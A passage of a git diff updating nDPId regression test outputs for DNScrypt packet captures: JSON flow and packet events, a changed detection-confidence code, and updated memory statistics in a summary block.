01233{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":946739727013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739727013,"pkt":"REREREREZmZmZmZmCABFAAJchI5AALYRC\/YKAAABMw8+QYFBAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAvLo+OTm36q6otOO+fGemzVvq0dD3jxm9VGAJSNGJ7CPJoGqXj8m9e0jdRInMcNRA9p4+0Ni8e31vogtljvbwYYgmhAZTxwGYs6C50cDQFt1uHfEvD15mlAq995eAVsOx9PzSthVaX\/ivHpOY6L3Ij\/Ef7SZJJCujYYFW73myi8HjWORk7BxBZfRqH+6sXHsTHW9JgIyfg81CrvoYmjj6eguA0dO39fTJaKjXzcpWKnEcMMNV4ml8LGnAy0T9PzW3di7md5aeCc6dVE4FKwEMVWCPhdhJoRf2eXkrqBw09LkEK01y9a7hl1hmtvIUWP7Fpi4bKoZT2dc0fFL1f9KzoS20B8JdI1HDtUFbfn9WkC6dXWkvGuh\/9+Rlymk6CKSLR0QVl5o+\/deX43CF3YmoxgH2snZah0gHUFwhHSA2MzyATzLiO4hwopOla7EXLAzrjJnmBpaFbHi1L+QqXQh2bLrcU+P9O4f9I6E21iw7CMaLWnshFHMR4k17Kr3eYvvp5nk3smnj6RkzbyXiwre7VxnxR8luWJiFKQAtgTS7iTP90QNwfWgaQbUtbBzkaFhJU0sLHhiOY7bVruAAJT6m3XAbRU\/eHVLtQFKfLcw5DBcGucce2S1ZsrhqHFcOTeV5s1bkuGYusFVrqTNERXk+qQd0EJRZ80ghllq3WCfjIbNz4NU54JpS6KXFVABPgeMm+7RrRRXRHV"} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":946739727039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739727039,"pkt":"ZmZmZmZmRERERERECABFAADM4h4AADURcPYzDz5BCgAAAQG7gUEAuGT7cjZmbnZXajgLy6Pjk5t+quqLTjthMYRcpmrtygKi+8ge\/d5a\/EggfKFstwqlUcEQ0npRyt3o\/+nrMu7IyAemLvDGwM3nY6O0vBX25jf4NlD5NhKqGUUpFydrLINODy\/Et1yVVHUUL4VBz3CwT8bs4b54QwYXASMjQfnf\/0NTpkvJ+0v2f5ntIAM7o81gzx\/1ovB+r6k93kwem7LHnom40gyZk3GGiIOpwn\/P\/XOKwtE="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739861286,"flow_last_seen":946739861286,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":946739861286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739861286,"pkt":"REREREREZmZmZmZmCABFAAJc8z5AAGQR70UKAAABMw8+QZ7jAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDEDim3A5yf0wjjkn7c0KZ99+wsaC8Q0jJNdVtRyvQ4vttz57bauXWf7aWWZI9GXe13Bq\/1R6iUwT\/A0\/zRCc0Ayq9cmcu623YyCddihLAAMnrLyfM6t6rL27MiG1nzMzmCPyF28NwS5XqwjPRfHv4CZ99g0HmhnodYUO8q68IgHhgstyCXs7D74EPnDSNCXWvxBvHIE3vRmyPvunw0teioCjIqxqULRcggjd13KNSzhv65LTFQDOYbWOCn+rymPlyEaTGV8M85qpLCbZBx+P2mZMjdPflMOxEUQrHk9kdqOlL2mWcrX2tI9xOtQuzvv+NeAjtLGeixP59GGL75pvlLSdqyad1gu\/frI3Onyk042MoSYGJ6RwV3eaPNbZQCtEwb9AOFIXBmvRH9XM7npQUXePLACdz9iCTPKnV7Kw8ctrZrqQ4N6l7ZvcAG2rUT+Q9\/LXDXqKjl09ujD68NhiQh61LzaYdfK4i7pycnU4qJoDyh6wqXlEnhJrx33Uml0q43\/LZkKq6+gBtMyFx1G0t8TXOxdVJjjFCI6asgc8Kxe6G3w1FuEYOCYdPJ1BDXSvfQyl+xvLRdx79zlvjoh3CA3lgSqjekZ4r\/nVmPAWeluQHxO36OZiUmB2ai6gs8+TK+H6\/M45c1\/tfkqR+WeZABxv3Wq+MtDzkLR1Ba9KFIEFLcYA\/aPSp26qFfnJhX4KU8kKJXh\/RvHe"} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":946739861499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739861499,"pkt":"ZmZmZmZmRERERERECABFAADMBL8AADQRT1YzDz5BCgAAAQG7nuMAuKxVcjZmbnZXajhA4ptwOcn9MI45J+2cfN20Dl9sTMp3rF67X\/jDpIVgb1a+3\/m31lpJBtYvfwV0B9vwzZtjNo+jG7GftQDbJaUY\/oveZ3k2CcZHOjICUKnGXvyF5yEl+85urFpytmNQcYoVHSk5XuOkfP++TbbcrYxYsDH+x2d1Xg60pF+BeHKLrLF0X3ik2Kl1hdwwJCMdJ5w1\/ra7TZUP4kyuPD6WApR9UYb+H+3yIn0="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00591{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":608,"packets-processed":488,"total-skipped-flows":0,"total-l4-payload-len":289066,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":245,"total-detection-updates":0,"total-updates":6,"current-active-flows":0,"total-active-flows":245,"total-idle-flows":245,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":946739861499} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 608/488 @@ -1473,9 +1473,9 @@ ~~ total active/idle flows...: 245/245 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6142235 bytes -~~ total memory freed........: 6142235 bytes -~~ total allocations/frees...: 119578/119578 +~~ total memory allocated....: 6275869 bytes +~~ total memory freed........: 6275869 bytes +~~ total allocations/frees...: 122340/122340 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 228 chars ~~ json string max len.......: 2433 chars diff --git a/test/results/dnscrypt-v2-doh.pcap.out b/test/results/dnscrypt-v2-doh.pcap.out index e395b3f5f..754723853 100644 --- a/test/results/dnscrypt-v2-doh.pcap.out +++ b/test/results/dnscrypt-v2-doh.pcap.out @@ -2,244 +2,244 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946739298533} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} 